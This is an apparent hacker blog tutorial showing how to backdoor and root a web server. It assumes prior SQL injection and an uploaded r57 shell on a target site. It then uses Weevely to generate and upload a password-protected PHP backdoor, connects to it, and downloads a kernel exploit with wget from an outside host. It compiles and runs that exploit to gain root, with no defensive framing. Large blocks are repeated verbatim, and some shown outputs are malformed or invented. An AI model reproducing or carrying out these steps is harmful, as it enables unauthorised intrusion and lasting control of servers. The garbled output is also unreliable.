BackDoor & Rooting With Backtrack 5
Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)
Admin pAnel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php
now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!
Now go and check your desktop. There will be a encrypted php file bdoor.php .
=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php
Well using exploits depend upon the kernel you have .. Different versions have different exploits!! you need to get the exploit . compile it !! and execute it..
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)
Admin pAnel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php
now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p shadow008
+ Backdoor file ‘bdoor.php ’ created with password ‘shadow008".
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p shadow008
+ Backdoor file ‘bdoor.php ’ created with password ‘shadow008".
=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php
root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p shadow008
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp]
Rooted ... Enjoy!!